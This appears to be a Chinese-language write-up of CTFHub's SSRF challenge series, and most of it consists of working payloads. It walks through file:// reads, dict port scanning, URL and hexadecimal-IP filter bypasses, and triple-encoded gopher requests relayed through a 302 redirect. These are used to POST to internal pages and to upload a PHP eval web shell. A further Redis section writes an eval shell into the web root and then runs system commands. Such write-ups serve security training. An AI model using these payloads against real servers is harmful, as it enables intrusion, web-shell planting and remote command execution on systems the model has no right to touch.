内网访问
?url
伪协议读取文件
根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。
URL伪协议有如下这些:
file:///
dict
端口扫描
dict协议可以用来探测开放的端口
构造payload dict://127.0.0.1:端口号
利用burpsuite进行爆破
然后访问就行
URL Bypass
了解:如果传入的URL为http://[email protected]:[email protected],那么进入 safe_request_url后,parse_url 取到的host其实是baidu.com,而curl取到的是127.0.0.1:80,所以检测IP时是正常的一个网站域名而实际curl请求时却构造的127.0.0.1,以此实现SSRF攻击。
因此这个题目要求url must startwith “http://notfound.ctfhub.com”
我们直接构造?url=http://[email protected]/flag.php
成功得到flag。
数字IP Bypass
进入环境,尝试访问?url=127.0.0.1/flag.php
因此尝试将ip地址转换为进制的方式进行绕过,127.0.0.1转换为16进制是0x7F000001,这样就可以成功得到flag
302跳转 Bypass
题目出现问题,等修改好了再说
DNS重绑定 Bypass
题目出了问题,等修改好了再说
POST请求
我们进入之后可以试试flag.php,果然存在flag.php,不过需要从127.0.0.1进行访问。我们访问一下:
查看源码
查看302.php,发现了可以构造url用302跳转。
这题需要用gopher协议通过302.php的跳转去post key到flag.php,不过需要注意的是要从127.0.0.1发送数据。
首先构造一个最基本的post请求:
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36 #特别注意此处的长度,长度不对也是不行的
key=2ddf50f048c2728241fc9c1a6a2d0eac #key需要去通过127.0.0.1访问flag.php获取,也就是flag的MD5值。
首先进行一次url编码,将换行%0A改成%0D%0A
POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Akey%3D1de171b79f0bc7caabdd7ba6fee00c56
然后再进行2次URL编码,也就是说一共要进行三次URL编码,最后为:
POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D1de171b79f0bc7caabdd7ba6fee00c56
最后使用gopher协议请求即可
?url=127.0.0.1/302.php?url=gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D1de171b79f0bc7caabdd7ba6fee00c56
上传文件
提示:这次需要上传一个文件到flag.php了.我准备了个302.php可能会有用.祝你好运
使用file伪协议读取到源码?url=file:///var/www/html/flag.php
发现没有提交,所以要在前端添加提交
右键 edit as html 来写
上传一个非空文件,这里我们上传了一个php
url编码一次,把%0A换成%0D%0A,然后再url编码两次:
/?url=127.0.0.1/302.php?url=gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Length%25253A%252520328%25250D%25250ACache-Control%25253A%252520max-age%25253D0%25250D%25250AUpgrade-Insecure-Requests%25253A%2525201%25250D%25250AOrigin%25253A%252520http%25253A%25252F%25252Fchallenge-01037cbf4c653e93.sandbox.ctfhub.com%25253A10080%25250D%25250AContent-Type%25253A%252520multipart%25252Fform-data%25253B%252520boundary%25253D----WebKitFormBoundaryE3ar268swYQeTYZs%25250D%25250AUser-Agent%25253A%252520Mozilla%25252F5.0%252520(Windows%252520NT%25252010.0%25253B%252520Win64%25253B%252520x64)%252520AppleWebKit%25252F537.36%252520(KHTML%25252C%252520like%252520Gecko)%252520Chrome%25252F85.0.4183.102%252520Safari%25252F537.36%25250D%25250AAccept%25253A%252520text%25252Fhtml%25252Capplication%25252Fxhtml%25252Bxml%25252Capplication%25252Fxml%25253Bq%25253D0.9%25252Cimage%25252Favif%25252Cimage%25252Fwebp%25252Cimage%25252Fapng%25252C*%25252F*%25253Bq%25253D0.8%25252Capplication%25252Fsigned-exchange%25253Bv%25253Db3%25253Bq%25253D0.9%25250D%25250AReferer%25253A%252520http%25253A%25252F%25252Fchallenge-01037cbf4c653e93.sandbox.ctfhub.com%25253A10080%25252F%25253Furl%25253D127.0.0.1%25252Fflag.php%25250D%25250AAccept-Encoding%25253A%252520gzip%25252C%252520deflate%25250D%25250AAccept-Language%25253A%252520zh-CN%25252Czh%25253Bq%25253D0.9%25252Cen-US%25253Bq%25253D0.8%25252Cen%25253Bq%25253D0.7%25250D%25250AConnection%25253A%252520close%25250D%25250A%25250D%25250A------WebKitFormBoundaryE3ar268swYQeTYZs%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522file%252522%25253B%252520filename%25253D%252522XiaoMa.php%252522%25250D%25250AContent-Type%25253A%252520application%25252Foctet-stream%25250D%25250A%25250D%25250A%25253C%25253Fphp%25250D%25250A%252540eval(%252524_POST%25255B'feng'%25255D)%25253B%25253F%25253E%25250D%25250A------WebKitFormBoundaryE3ar268swYQeTYZs%25250D%25250AContent-Disposition%25253A%252520form-data%25253B%252520name%25253D%252522submit%252522%25250D%25250A%25250D%25250A%2525E6%25258F%252590%2525E4%2525BA%2525A4%25250D%25250A------WebKitFormBoundaryE3ar268swYQeTYZs--%25250D%25250A
FastCGI协议
Redis协议
首先我们需要了解关于Redis的相关知识:
Redis 配置详解
浅析Redis中SSRF的利用
Redis在SSRF中的应用
这题不是用shell反弹,而是写文件,然后进行命令执行。因此redis命令如下:
flushall
set 1 '<?php eval($_GET["feng"]);?>'
config set dir /var/www/html
config set dbfilename feng.php
save
需要再经过一次url加密,这样才行。最终我的是这样:
/?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B%2522feng%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Afeng.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A
执行过之后,就写入了feng.php。这时候,如果你通过?url=127.0.0.1/feng.php进行命令执行,会有玄学问题。我不知道是不是我url的问题,反正我这里出现了玄学问题。
因此直接访问feng.php,然后就是命令执行:
http://challenge-88a3757f316234ba.sandbox.ctfhub.com:10080/feng.php?feng=system("ls /");
http://challenge-88a3757f316234ba.sandbox.ctfhub.com:10080/feng.php?feng=system("cat /flag_6fb66dcb5b32fff57ef6f5bf213f12e5");
